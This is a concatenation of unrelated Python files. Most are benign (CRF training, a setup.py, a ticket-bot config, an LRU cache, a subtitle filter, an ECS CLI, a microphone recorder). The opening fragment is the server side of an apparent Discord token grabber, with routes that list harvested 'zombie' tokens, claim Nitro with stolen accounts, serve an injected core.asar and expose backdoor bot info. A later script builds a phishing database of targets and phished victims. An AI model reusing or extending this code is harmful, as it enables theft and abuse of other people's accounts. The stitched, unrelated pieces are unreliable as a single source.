victim_to_send) @app.route('/check-tokens', methods= ['GET']) def check_tokens(): self.Cache.check_zombies() self.Cache.send_report() return render_template('index.html'), 201 @app.route(f'{self.base_api}/claim-nitro', methods= ['POST']) def claim_nitro(): self.Utils.Claim_Nitro(request.args.get('code'), request.args.get('channel')) return 'ok', 201 @app.route(f'{self.base_api}/download-core', methods= ['GET']) def download_core(): return send_file('./Grabber/src/core.asar', as_attachment=True) @app.route(f'{self.base_api}/get-all-tokens', methods= ['GET']) def send_all_tokens(): return self.Cache.get_all_zombies() @app.route(f'{self.base_api}/get-bot-infos', methods= ['GET']) def get_bot_info(): return config['BACKDOOR_BOT_INFOS'] def start(self): self.Cache.load_tokens() self.Cache.check_zombies() self.Cache.send_report() self.app.run(host= '0.0.0.0', port= self.prt) if __name__ == '__main__': with open('./config.json', 'r+') as config_file: config = json.load(config_file) Api(config['API']['PORT'], config).start()
# split is the proporitionality of the training set that first CRF uses from SentenceGetter import SentenceGetter import pandas as pd import configparser from Sents2Features import sent2labels from Sents2Features import sent2features from sklearn_crfsuite import CRF from sklearn.model_selection import cross_val_predict from sklearn_crfsuite.metrics import flat_classification_report import sklearn.model_selection def getTrainingData(split=2): config = configparser.ConfigParser() config.read('../trainConfig.ini') paths = config['Paths'] train_path = paths['train_path'] # train_data = pd.read_csv("CRF-is-400k-train.tsv", sep='\t') train_data = pd.read_csv(train_path, sep='\t') train_data = train_data.fillna(method="ffill") train_getter = SentenceGetter(train_data) split_index = round(split * len(train_getter.sentences)) # int(1*(len(train_getter.sentences)/3))round(prop*len(x)) if split != 2: train_sentences_1 = train_getter.sentences[:split_index] train_sentences_2 = train_getter.sentences[split_index:] return train_sentences_1, train_sentences_2 else: train_sentences_1 = train_getter.sentences return train_sentences_1 def getValidData(): config = configparser.ConfigParser() config.read('../trainConfig.ini') paths = config['Paths'] # print(len(train_getter.sentences)) # print(len(y_train_1)) # print(len(y_train_2)) # valid_data = pd.read_csv("CRF-is-400k-valid.tsv", sep='\t') valid_path = paths['valid_path'] valid_data = pd.read_csv(valid_path, sep='\t') valid_data = valid_data.fillna(method="ffill") valid_getter = SentenceGetter(valid_data) valid_sentences = valid_getter.sentences return valid_sentences def getTestData(): config = configparser.ConfigParser() config.read('../trainConfig.ini') paths = config['Paths'] # test_data = pd.read_csv("CRF-is-400k-test.tsv", sep='\t') test_path = paths['valid_path'] test_data = pd.read_csv(test_path, sep='\t') test_data = test_data.fillna(method="ffill") test_getter = SentenceGetter(test_data) test_sentences = test_getter.sentences return test_sentences def getDataFromPath(path): data = pd.read_csv(path, sep='\t') data = data.fillna(method="ffill") sent_getter = SentenceGetter(data) sents = sent_getter.sentences return sents def write_to_CoNLL(mdl_file_name, sentence2features, test_sentences, write_path): X_test_local = [] cond_rand_mdl = CRF(algorithm='lbfgs', c1=0.0001, c2=0.0001, max_iterations=100, all_possible_transitions=False, model_filename=mdl_file_name) if mdl_file_name[(len(mdl_file_name) - 1)] == '2': old_crf = CRF(algorithm='lbfgs', c1=0.0001, c2=0.0001, max_iterations=100, all_possible_transitions=False, model_filename=(mdl_file_name[:(len(mdl_file_name) - 1)]) + '1') X_test_local = [sent2features_second_guess(s, sentence2features, old_crf) for s in test_sentences] else: X_test_local = [sentence2features(s) for s in test_sentences] predictions = cond_rand_mdl.predict(X_test_local) with open(write_path, 'a') as f: for i in range(0, len(predictions)): sent = test_sentences[i] preds = predictions[i] for j in range(0, len(sent)): str_to_write = '{}\t{}\n'.format(sent[j][0], preds[j]) f.write(str_to_write) f.write('\n') def train(model_name, xtrain, ytrain): print('hallo') crf = CRF(algorithm='lbfgs', c1=0.0001, c2=0.0001, max_iterations=100, all_possible_transitions=False, model_filename=(model_name)) crf.fit(xtrain, ytrain) print('hallo2') return crf def evaluate(model_name, crf, xvalid, yvalid): dict_1 = {} pred = cross_val_predict(estimator=crf, X=xvalid, y=yvalid, cv=5) # report = flat_classification_report(y_pred=pred, y_true=y_valid, labels=sorted_labels, digits=3, output_dict=True) print(flat_classification_report(y_pred=pred, y_true=yvalid, labels=sorted_labels, digits=3)) def execute_experiment(sent_to_features_func, batch, experiment_name, result_dict, split_train_proportion = 2): print(experiment_name) train_sentences_1, train_sentences_2, valid_sentences, test_sentences=getData(batch) y_train_1 = [sent2labels(s) for s in train_sentences_1] y_valid = [sent2labels(s) for s in valid_sentences] y_test = [sent2labels(s) for s in test_sentences] print("getting data done....") X_train = [sent_to_features_func(s) for s in train_sentences_1] print("train_sents done....") crf1 = train(experiment_name+'_1', X_train, y_train_1) print('training done....') X_valid1 = [sent_to_features_func(s) for s in valid_sentences] # evaluate(model_name, crf, xvalid , yvalid): evaluate(experiment_name + '_1', crf1, X_valid1, y_valid) to_CoNLL(experiment_name +'_1',sent2features_final, test_sentences) if split_train_proportion != 2: y_train_2 = [sent2labels(s) for s in train_sentences_2] X_train = [sent2features_second_guess(s, sent_to_features_func, crf1) for s in train_sentences_2] print("train_sents done....") crf2 = train(experiment_name+'_2', X_train, y_train_2) print('training done....') X_valid2 = [sent2features_second_guess(s, sent_to_features_func, crf1) for s in valid_sentences] evaluate(experiment_name + '_2', crf2, X_valid2, y_valid) to_CoNLL(experiment_name +'_2',sent2features_final, test_sentences)
# -*- coding: utf-8 -*- """ Set up benchmarker package. To use the 'upload' functionality of this file, you must do: pip install twine """ import io import os import sys import warnings from pathlib import Path from shutil import rmtree from typing import Union from setuptools import Command, find_packages, setup def parse_requirements(req_path: Path): """Parse requirements Args: req_path: path to requirements file Returns: list of requirement strings in form of "library" or "library==0.0.0" """ # Parse requirements from file - no need to specify them many times # Any dependencies defined in includes are omitted. # Only dependencies in provided file are considered # This is intended behavior parsed_requirements = [] with open(req_path) as f: for line in f: content = line.split("#")[0].strip() # remove comments if "://" in content: # URL warnings.warn(f"Ignoring '{content}' requirement. Setuptools does not support URLs.") elif len(content) > 0 and content[0] != '-': # non empty and not a command parsed_requirements.append(content) return parsed_requirements def read_requirements(file_path: Union[str, Path] = 'requirements/core.txt') -> list: """Get required packages for this module to be executed. Args: file_path: the requirements file path. Returns: list of required packages """ if isinstance(file_path, str): file_path = Path(file_path) if not file_path.exists(): return [] req_path = file_path.resolve() return parse_requirements(req_path) # Package meta-data. NAME = 'benchmarker' DESCRIPTION = 'DUE-BASELINES models for 2D document processing' URL = '' AUTHOR = 'Applica.ai' REQUIRES_PYTHON = '>=3.6.0' VERSION = None REQUIRES = read_requirements() + read_requirements('requirements/pre.txt') # Create dict for extras on the basis of requirements/extras/[name].txt pattern EXTRAS = {} for file_path in Path('requirements/extras/').glob("*.txt"): name = file_path.stem reqs = read_requirements(file_path) if len(reqs) > 0: EXTRAS[name] = reqs else: warnings.warn(f'Extras group {name} does not have any valid requirements and will not be available.') # Import the README and use it as the long-description. # Note: this will only work if 'README.md' is present in your MANIFEST.in file! try: with io.open(Path('README.md').resolve(), encoding='utf-8') as f: long_description = '\n' + f.read() except FileNotFoundError: long_description = DESCRIPTION # Load the package's __version__.py module as a dictionary. about = {} if not VERSION: with open(Path(NAME + '/__version__.py').resolve()) as f: exec(f.read(), about) VERSION = about['__version__'] else: about['__version__'] = VERSION class UploadCommand(Command): """Support setup.py upload.""" description = 'Build and publish the package.' user_options = [] @staticmethod def status(s): """Print things in bold. Args: s: string to print in bold. """ print('\033[1m{0}\033[0m'.format(s)) def initialize_options(self): pass def finalize_options(self): pass def run(self): try: self.status('Removing previous builds…') rmtree(Path('dist').resolve()) except OSError: pass self.status('Building Source and Wheel (universal) distribution…') os.system( '{0} setup.py sdist bdist_wheel --universal'.format( sys.executable)) self.status('Uploading the package to PyPI via Twine…') os.system('twine upload dist/*') self.status('Pushing git tags…') os.system('git tag v{0}'.format(about['__version__'])) os.system('git push --tags') sys.exit() if __name__ == '__main__': # Where the magic happens: setup( name=NAME, version=about['__version__'], description=DESCRIPTION, long_description=long_description, long_description_content_type='text/markdown', author=AUTHOR, # author_email=EMAIL, python_requires=REQUIRES_PYTHON, url=URL, packages=['benchmarker'] + ['benchmarker.' + pkg for pkg in find_packages('benchmarker')], install_requires=REQUIRES, extras_require=EXTRAS, include_package_data=True, license='PROPRIETARY Applica', classifiers=[ # Trove classifiers 'Development Status :: 3 - Alpha', 'License :: PROPRIETARY Applica', 'Programming Language :: Python :: 3.8', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: Implementation :: PyPy' ], # $ setup.py publish support. cmdclass={ 'upload': UploadCommand, }, )
#coding=utf-8 import os # Basic settings # requests settings TIMEOUT = 5 VERIFY = False # directories might be used LOCATIONS = { 'log': 'log', 'data': 'data', } # stderr is redirected to this file ERR_LOG_FILE = os.path.join(LOCATIONS['log'], 'err.log') # log in this file LOGGING_FILE = os.path.join(LOCATIONS['log'], 'requests.log') STATION_NAME_FILE = os.path.join(LOCATIONS['data'], 'station_name.js') CAPTCHA_FILE = os.path.join(LOCATIONS['data'], 'captcha.png') CRYPTO_JS = os.path.join(LOCATIONS['data'], 'crypto.js') CRYPTO_SCRIPT = os.path.join(LOCATIONS['data'], 'do_crypto.js') # Query settings QUERY_INTERVAL = 1 QUERY_ARGS_NS = 'leftTicketDTO' TRAIN_DATA_JSON_KEY = 'queryLeftNewDTO' LOGIN_NS = 'loginUserDTO' USER_NS = 'userDTO' PURPOSE_CODES = {'学生': '0X00', '普通': 'ADULT'} PURPOSE_ID = {'0X00': 3, '学生': 3, 'ADULT': 1, '普通': 1} SEAT_CODES = { '商务座': 'swz', '特等座': 'tz', '一等座': 'zy', '二等座': 'ze', '高级软卧': 'gr', '软卧': 'rw', '硬卧': 'yw', '软座': 'rz', '硬座': 'yz', '无座': 'wz', '其他': 'qt', } SEAT_ID = { 'SWZ': '9', 'TZ': 'P', 'ZY': 'M', 'ZE': 'O', 'GR': '6', 'RW': '4', 'YW': '3', 'RZ': '2', 'YZ': '1', 'WZ': 'WZ', 'QT': '', } URL_BASE = 'https://kyfw.12306.cn/' URLS = { 'entry': URL_BASE + 'otn/', 'station_name': URL_BASE + 'otn/resources/js/framework/station_name.js?station_version=1.8260', 'query': URL_BASE + 'otn/leftTicket/queryT', 'query_log': URL_BASE + 'otn/leftTicket/log', 'login_captcha': URL_BASE + 'otn/passcodeNew/getPassCodeNew?module=login&rand=sjrand', 'order_captcha': URL_BASE + 'otn/passcodeNew/getPassCodeNew?module=passenger&rand=randp', 'check_captcha': URL_BASE + 'otn/passcodeNew/checkRandCodeAnsyn', 'login_token': URL_BASE + 'otn/login/init', 'order_init_token': URL_BASE + 'otn/leftTicket/init', 'login': URL_BASE + 'otn/login/loginAysnSuggest', 'check_login': URL_BASE + 'otn/login/checkUser', 'passengers': URL_BASE + 'otn/confirmPassenger/getPassengerDTOs', 'order_init_submit': URL_BASE + 'otn/leftTicket/submitOrderRequest', 'order_confirm': URL_BASE + 'otn/confirmPassenger/initDc', 'order_check': URL_BASE + 'otn/confirmPassenger/checkOrderInfo', } # 3rd party tools settings # Setup for settings import socket if socket.gethostname() in ['duankq-ThinkPad-X201', ]: DEBUG = True else: DEBUG = False import os for loc in LOCATIONS.values(): if not os.path.isdir(loc): os.mkdir(loc) for (k, v) in SEAT_CODES.iteritems(): SEAT_ID[k] = SEAT_ID[v.upper()] SEAT_ID[v] = SEAT_ID[v.upper()]
from hellbox.chutes.chute import Chute class CompositeChute(Chute): def __init__(self, *chutes): chutes = [self.__clone(c) for c in chutes] self.head = self.tail = chutes[0] for chute in chutes[1:]: self.tail = self.tail >> chute def __call__(self, *args): self.head(*args) def to(self, *args): self.tail.to(*args) def __rrshift__(self, other): other.to(self.head) return self.tail def __clone(self, chute): c = object.__new__(chute.__class__) c.__dict__ = chute.__dict__.copy() return c
import sqlite3 from os import system a= system("rm dbz") conn = sqlite3.connect('dbz') conn.execute(""" CREATE TABLE targets (hash TEXT NOT NULL PRIMARY KEY, name TEXT) """) conn.execute(""" CREATE TABLE phished (hash TEXT, timings DATETIME) """) conn.execute(""" CREATE TABLE data (hash TEXT NOT NULL PRIMARY KEY, details TEXT) """) conn.commit() conn.close()
#!/usr/bin/env python # -*- coding: utf-8 -* # Copyright: [CUP] - See LICENSE for details. # Authors: Guannan Ma (@mythmgn), """ :description: **Async Module is a tcp framework for asynchrous network msg tranfering** """ # TODO: # 1. If the socket has been in a state in which it does not send or # recv any msg for more than 30mins. Shutdown the context. # 2. Msg management # Enhancement list: # 1. If the socket has too many msg pending there. # and msg cannot be sent out. Consider this net link as dead. # and shutdown && close it # 2. Multiple threads sending things. # BUGS: # FIXED: # 1. Send socket does not register in epoll # 2. Peer2Context has resource competition # 3. connection has starvation bug # Silly mistakes that I made: # 1. TCP context creation and deletion does not has lock. (Mainly on creation) # 2. Net MSG queue will become very large if the network read/write speed does # not match. # 3. # vi:set tw=0 ts=4 sw=4 nowrap fdm=indent
# tools for dealing with files, mostly images """ Copyright 2016 Fabric S.P.A, Emmanuel Benazera, Alexandre Girard Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from os import listdir from os.path import isfile, join from os import walk import os import time import glob import sys def list_files(repository,ext='.jpg',nfiles=-1,pattern='*',last_hour=-1): onlyfiles = [] fpattern = repository + '/' + pattern + ext filenames = glob.glob(fpattern) if last_hour >= 1: nfilenames = [] past = time.time() - last_hour*60*60 for f in filenames: if os.path.getmtime(f) >= past: nfilenames.append(f) return nfilenames if nfiles > 0: return filenames[:nfiles] else: return filenames
# # Copyright The NOMAD Authors. # # This file is part of NOMAD. # See https://nomad-lab.eu for further info. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import numpy as np # pylint: disable=unused-import import typing # pylint: disable=unused-import from nomad.metainfo import ( # pylint: disable=unused-import MSection, MCategory, Category, Package, Quantity, Section, SubSection, Reference ) from nomad.datamodel.metainfo import simulation from nomad.metainfo.metainfo import JSON m_package = Package() class Run(simulation.run.Run): m_def = Section(validate=False, extends_base_section=True) x_psi4_git_rev = Quantity( type=str, shape=[], description=''' ''') x_psi4_process_id = Quantity( type=np.dtype(np.int32), shape=[], description=''' ''') x_psi4_psidatadir = Quantity( type=str, shape=[], description=''' ''') x_psi4_memory = Quantity( type=np.dtype(np.float64), shape=[], # unit='MiB', description=''' ''') x_psi4_threads = Quantity( type=np.dtype(np.int32), shape=[], description=''' ''') x_psi4_input_file = Quantity( type=str, shape=[], description=''' ''') class System(simulation.system.System): m_def = Section(validate=False, extends_base_section=True) x_psi4_molecular_point_group = Quantity( type=str, shape=[], description=''' ''') x_psi4_full_point_group = Quantity( type=str, shape=[], description=''' ''') x_psi4_molecular_symmetry = Quantity( type=str, shape=[], description=''' ''') x_psi4_rotational_constants = Quantity( type=np.dtype(np.float64), shape=[3], # unit='1/cm', description=''' ''') x_psi4_nuclear_repulsion = Quantity( type=np.dtype(np.float64), shape=[], description=''' ''') x_psi4_charge = Quantity( type=np.dtype(np.float64), shape=[], description=''' ''') x_psi4_multiplicity = Quantity( type=np.dtype(np.float64), shape=[], description=''' ''') x_psi4_electrons = Quantity( type=np.dtype(np.float64), shape=[], description=''' ''') x_psi4_nalpha = Quantity( type=np.dtype(np.float64), shape=[], description=''' ''') x_psi4_nbeta = Quantity( type=np.dtype(np.float64), shape=[], description=''' ''') class Scf(simulation.method.Scf): m_def = Section(validate=False, extends_base_section=True) x_psi4_diis = Quantity( type=bool, shape=[], description=''' ''') x_psi4_mom = Quantity( type=bool, shape=[], description=''' ''') x_psi4_fractional_occupation = Quantity( type=bool, shape=[], description=''' ''') x_psi4_guess_type = Quantity( type=str, shape=[], description=''' ''') x_psi4_integral_threshold = Quantity( type=np.dtype(np.float64), shape=[], description=''' ''') class BasisSetAtomCentered(simulation.method.BasisSetAtomCentered): m_def = Section(validate=False, extends_base_section=True) x_psi4_blend = Quantity( type=str, shape=[], description=''' ''') x_psi4_n_shells = Quantity( type=np.dtype(np.int32), shape=[], description=''' Gives the number of shell types used. ''') x_psi4_max_angular_momentum = Quantity( type=np.dtype(np.int32), shape=[], description=''' Maximum angular momentum quantum number corresponding to the shells used. ''') x_psi4_n_cartesian_functions = Quantity( type=np.dtype(np.int32), shape=[], description=''' ''') x_psi4_spherical_harmonics = Quantity( type=bool, shape=[], description=''' ''') x_psi4_n_ecp_primitives = Quantity( type=np.dtype(np.int32), shape=[], description=''' ''') x_psi4_n_ecp_core_electrons = Quantity( type=np.dtype(np.int32), shape=[], description=''' ''') class Method(simulation.method.Method): m_def = Section(validate=False, extends_base_section=True) x_psi4_scf_algorithm_type = Quantity( type=str, shape=[], description=''' ''') x_psi4_diis = Quantity( type=bool, shape=[], description=''' ''') x_psi4_mom = Quantity( type=bool, shape=[], description=''' ''') x_psi4_fractional_occupation = Quantity( type=bool, shape=[], description=''' ''') x_psi4_guess_type = Quantity( type=str, shape=[], description=''' ''') x_psi4_options = Quantity( type=JSON, shape=[], description=''' ''') x_psi4_jk_matrices_parameters = Quantity( type=JSON, shape=[], description=''' ''') x_psi4_parameters = Quantity( type=JSON, shape=[], description=''' ''') class DFT(simulation.method.DFT): m_def = Section(validate=False, extends_base_section=True) x_psi4_molecular_quadrature = Quantity( type=typing.Any, shape=[], description=''' ''') class x_psi4_root_information(MSection): m_def = Section(validate=False) x_psi4_root_energy = Quantity( type=np.dtype(np.float64), shape=[], description=''' ''') class Calculation(simulation.calculation.Calculation): m_def = Section(validate=False, extends_base_section=True) x_psi4_s2_expected = Quantity( type=np.dtype(np.float64), shape=[], description=''' ''') x_psi4_s2_observed = Quantity( type=np.dtype(np.float64), shape=[], description=''' ''') x_psi4_s_expected = Quantity( type=np.dtype(np.float64), shape=[], description=''' ''') x_psi4_s_observed = Quantity( type=np.dtype(np.float64), shape=[], description=''' ''') x_psi4_root_information = SubSection(sub_section=x_psi4_root_information.m_def, repeats=True)
class DoubleLinkedListNode(object): def __init__(self, value): self.value = value self.next = None self.previous = None def __repr__(self): return str(self.value) class LRU_Cache(object): def __init__(self, capacity: int): self._cache = dict() self.capacity = capacity self.head = DoubleLinkedListNode(0) self.tail = DoubleLinkedListNode(0) self.head.next = self.tail self.tail.previous = self.head def get(self, key): if key in self._cache: node = self._cache.get(key) self._remove(node) self._add(node) return node return -1 def set(self, key, value): if key in self._cache: self._remove(self.cache.get(key)) node = DoubleLinkedListNode(value) self._add(node) self._cache[key] = node if len(self._cache) > self.capacity: node = self.head.next self._remove(node) node_key = list(self._cache.keys())[list(self._cache.values()).index(node)] del self._cache[node_key] def _add(self, node): last_node = self.tail.previous last_node.next = node self.tail.previous = node node.previous = last_node node.next = self.tail def _remove(self, node): previous_node = node.previous next_node = node.next previous_node.next = next_node next_node.previous = previous_node def __iter__(self): node = self.head while node: yield node node = node.next def __len__(self): return len(self._cache) our_cache = LRU_Cache(3) our_cache.set(1, 1) our_cache.set(2, 2) our_cache.set(3, 3) our_cache.set(4, 4) print ("Pass" if (-1 == our_cache.get(1)) else "Fail") print ("Pass" if (2 == our_cache.get(2).value) else "Fail") print ("Pass" if (3 == our_cache.get(3).value) else "Fail") print ("Pass" if (-1 == our_cache.get(9)) else "Fail") our_cache = LRU_Cache(0) our_cache.set(1, 1) print ("Pass" if (-1 == our_cache.get(1)) else "Fail") our_cache = LRU_Cache(1) our_cache.set(1, 0) our_cache.set(2, 0) print ("Pass" if (-1 == our_cache.get(1)) else "Fail")
#!/usr/bin/python3 """Filter and/or process subtitles' content that match a particular pattern.""" import importlib import logging from . import _cli log = logging.getLogger(__name__) def _true(param): """Always returns true for matching functionality.""" return True def _pass(param): """Always returns the given parameter for process functionality.""" return param def match(subtitles, imports, func_match, func_process, lines): """ Passes each matching subtitle-content to a function. :param subtitles: :py:class:`Subtitle` objects :param imports: Modules to import in the context of the function. :param str func_match: The function used to match lines. :param str func_process: The function used to process subtitle content. :param bool invert: Whether to only match lines that return False. :param per_line: Whether to apply functions to each line of content (as opposed to the whole content string). :rtype: :term:`generator` of :py:class:`Subtitle` objects """ for import_name in imports: real_import = importlib.import_module(import_name) globals()[import_name] = real_import # fmt: off # Evaluate the each function match_func = eval(func_match) if func_match else _true # nosec pylint: disable-msg=eval-used process_func = eval(func_process) if func_process else _pass # nosec pylint: disable-msg=eval-used # fmt: on # Match and process each subtitle (or subtitle-line). for subtitle in subtitles: if lines: matched_lines = [ line for line in subtitle.content.splitlines() if match_func(line) ] processed_lines = [process_func(line) for line in matched_lines] subtitle.content = "\n".join(processed_lines) else: if match_func(subtitle.content): subtitle.content = process_func(subtitle.content) else: subtitle.content = "" yield subtitle def set_args(): examples = { "Only include Chinese lines": "srt match -m hanzidentifier -fm hanzidentifier.has_chinese", "Exclude all lines which only contain numbers": "srt match -fm 'lambda x: not x.isdigit()'", "Strip HTML-like symbols from a subtitle": """srt match -m re -fp 'lambda sub: re.sub("<[^<]+?>", "", sub)'""", } parser = _cli.basic_parser(description=__doc__, examples=examples) parser.add_argument("--match", "--fm", help="The function used to match lines.") parser.add_argument("--process", "--fp", help="The function used to process lines.") parser.add_argument( "--module", "-m", help="modules to import in the function context", action="append", default=[], ) parser.add_argument( "--lines", "-l", help="Match the content of each subtitle-line, not each subtitle-content.", action="store_true", ) return parser.parse_args() def main(): args = set_args() logging.basicConfig(level=args.log_level) _cli.set_basic_args(args) matched_subs = match(args.input, args.module, args.match, args.process, args.lines) output = _cli.compose_suggest_on_fail(matched_subs, strict=args.strict) args.output.write(output) if __name__ == "__main__": # pragma: no cover main()
import sys import click from ..alias import AliasedGroup from .. import core, display, exceptions @click.group(cls=AliasedGroup, short_help='Create or update resources.', invoke_without_command=True) @click.option('-f', '--file', 'file_path', type=click.Path(exists=True), help="Select file or folder that contains the configuration to apply.") @click.option('-t', '--template', 'template_path', type=click.Path(exists=True), help="Select file or folder that contains the template configuration to apply.") @click.option('-e', '--env', 'envs', multiple=True, help="During update task-definition also update service.") @click.option('--env-file', 'env_file', multiple=True, help="During update task-definition also update service.") @click.option('--dry-run', is_flag=True, default=False, help="If true, only print the object that would be sent, without sending it") @click.option('--deploy', is_flag=True, default=False, help="During update task-definition also update service.") @click.option('-c', '--cluster', help="Specify cluster to execute command. Default usage cluster from context.") @click.pass_context def apply(ctx, file_path, template_path, dry_run, deploy, envs, env_file, cluster, **kwargs): """ \b # Apply yaml file with service definition cmd::ecsctl apply -f my-app/service.yaml \b # Apply yaml file with task definition cmd::ecsctl apply -f my-app/task-definition.yaml \b # Apply yaml template with task definition and set variables cmd::ecsctl apply -t my-app/task-definition.yaml.tpl --env image=my-image -e tag=1.0.0 \b # Apply yaml template with task definition and file with variables cmd::ecsctl apply -t my-app/task-definition.yaml.tpl --env-file dev.env \b # Apply yaml template with task definition and file with variables cmd::ecsctl apply -t my-app/task-definition.yaml.tpl --env-file common.env --env-file dev.env \b # Apply folder with configuration files cmd::ecsctl apply -f my-app/ \b # Apply yaml file with task definition and update service cmd::ecsctl apply -f my-app/task-definition.yaml --deploy \b # Check yaml file with task definition cmd::ecsctl apply -f my-app/task-definition.yaml --dry-run """ bw = ctx.obj['bw'] if not cluster: cluster = ctx.obj['cluster'] if file_path and not template_path: _type, f = 'file', core.FileLoader(file_path) elif template_path and not file_path: _type, f = 'template', core.FileLoaderTemplate(template_path, envs, env_file) else: click.echo(click.style(str('Usage only template or file to apply.'), fg='red')) return for doc in f.load(): object_type = core.ObjectType(cluster=cluster, item=doc) tmpl = object_type.get_template() click.echo(click.style(object_type.ID, fg='yellow')) if dry_run: tmpl.run_before(boto_wrapper=bw) param = display.de_unicode(tmpl.to_request()) tmpl.run_after(param, boto_wrapper=bw) click.echo(click.style(param, fg='blue')) click.echo('\n') else: try: resp = bw.apply_object(tmpl=tmpl, deploy=deploy) except Exception as err: click.echo(click.style(str(err), fg='red')) sys.exit(1) else: click.echo(click.style(object_type.show_response(resp), fg="green")) if resp.get('deploy'): ID = 'Service: {}'.format(resp['deploy']['service']['serviceName']) show_response = resp['deploy']['service']['serviceArn'] task_definition = resp['deploy']['service']['taskDefinition'] click.echo(click.style(ID, fg='yellow')) click.echo(click.style('{} -> {}'.format(show_response, task_definition), fg="green"))
import pyaudio import wave import audioop from collections import deque import os import urllib import time import math import subprocess as sub FLAC_CONV = 'flac -f' # We need a WAV to FLAC converter. flac is available # on Linux # Microphone stream config. CHUNK = 1024 # CHUNKS of bytes to read each time from mic FORMAT = pyaudio.paInt16 CHANNELS = 1 RATE = 16000 THRESHOLD = 1000 # The threshold intensity that defines silence # and noise signal (an int. lower than THRESHOLD is silence). SILENCE_LIMIT = 3 # Silence limit in seconds. The max amount of seconds where # only silence is recorded. When this time passes the # recording finishes and the file is delivered. PREV_AUDIO = 0.5 # Previous audio (in seconds) to prepend. When noise # is detected, how much of previously recorded audio is # prepended. This helps to prevent chopping the beggining # of the phrase. DURATION = 40 # Maximum chunk duration rel = RATE/CHUNK def audio_int(num_samples=50): """ Gets average audio intensity of your mic sound. You can use it to get average intensities while you're talking and/or silent. The average is the avg of the 20% largest intensities recorded. """ print ("Getting intensity values from mic.") p = pyaudio.PyAudio() stream = p.open(format=FORMAT, channels=CHANNELS, rate=RATE, input=True, frames_per_buffer=CHUNK) values = [math.sqrt(abs(audioop.avg(stream.read(CHUNK), 4))) for x in range(num_samples)] values = sorted(values, reverse=True) r = sum(values[:int(num_samples * 0.2)]) / int(num_samples * 0.2) print (" Finished ") print (" Average audio intensity is ", r) stream.close() p.terminate() return r def listen_for_speech(threshold=THRESHOLD, num_phrases=-1): """ Listens to Microphone, extracts phrases from it and sends it to Google's TTS service and returns response. a "phrase" is sound surrounded by silence (according to threshold). num_phrases controls how many phrases to process before finishing the listening process (-1 for infinite). """ # Open stream p = pyaudio.PyAudio() stream = p.open(format=FORMAT, channels=CHANNELS, rate=RATE, input=True, frames_per_buffer=CHUNK) print ("* Listening to microphone... ") audio2send = [] cur_data = '' # current chunk of audio data slid_win = deque(maxlen = int(SILENCE_LIMIT * rel)) # Prepend audio from 0.5 seconds before noise was detected prev_audio = deque(maxlen = int(PREV_AUDIO * rel)) started = False n = num_phrases response = [] while (num_phrases == -1 or n > 0): cur_data = stream.read(CHUNK) slid_win.append(math.sqrt(abs(audioop.avg(cur_data, 4)))) #print slid_win[-1] if(sum([x > THRESHOLD for x in slid_win]) > 0): if(not started): print (" Starting phrase recording") started = True audio2send.append(cur_data) elif (started is True): print (" Finished") # The limit was reached, finish capture and deliver. filename = save_speech(list(prev_audio) + audio2send, p) # Send file to Google and get response # r = stt_google_wav(filename) # if num_phrases == -1: # print ("Response", r) # else: # response.append(r) # Remove temp file. Comment line to review. # os.remove(filename) # Reset all started = False slid_win = deque(maxlen = int(SILENCE_LIMIT * rel)) prev_audio = deque(maxlen = int(PREV_AUDIO * rel)) audio2send = [] n -= 1 print ("Listening ...") else: prev_audio.append(cur_data) print ("* Done recording") stream.close() p.terminate() return response def chunks(l, n): """Yield successive n-sized chunks from l.""" for i in range(0, len(l), n): yield l[i:i + n] def save_speech(data, p): """ Saves mic data to temporary WAV file. Returns filename of saved file """ data = b''.join(data) output_folder = str(time.strftime('%d%m%Y')) if os.path.exists(output_folder) == False: os.mkdir(output_folder) if os.path.exists(output_folder + "/" + "noise") == False: os.mkdir(output_folder + "/" + "noise") if len(data) > (rel * DURATION): dur = int(32768 * DURATION) print (len(data), dur) dataset = chunks(data, dur) # dataset = [data[i:i + dur] for i in range(0, len(data), dur)] filenames = [] current_time = str(time.strftime('%H%M%S')) for index, item in enumerate(dataset): filename = current_time + '_' + str(index) wf = wave.open(output_folder + "/" + filename + '.wav', 'wb') wf.setnchannels(CHANNELS) wf.setsampwidth(p.get_sample_size(pyaudio.paInt16)) wf.setframerate(RATE) wf.writeframes(item) filenames.append(filename) wf.close() return filenames else: if len(data) < (rel * SILENCE_LIMIT + PREV_AUDIO * 1.5): print("Audio too short, likely to be noise.") filename = str(time.strftime('%H%M%S')) wf = wave.open(output_folder + "/" + "noise" + "/" + filename + '.wav', 'wb') wf.setnchannels(CHANNELS) wf.setsampwidth(p.get_sample_size(pyaudio.paInt16)) wf.setframerate(RATE) wf.writeframes(data) wf.close() else: filename = str(time.strftime('%H%M%S')) wf = wave.open(output_folder + "/" + filename + '.wav', 'wb') wf.setnchannels(CHANNELS) wf.setsampwidth(p.get_sample_size(pyaudio.paInt16)) wf.setframerate(RATE) wf.writeframes(data) wf.close() return filename if(__name__ == '__main__'): audio_int() # To measure your mic levels listen_for_speech() # listen to mic. #print stt_google_wav('hello.flac') # translate audio file
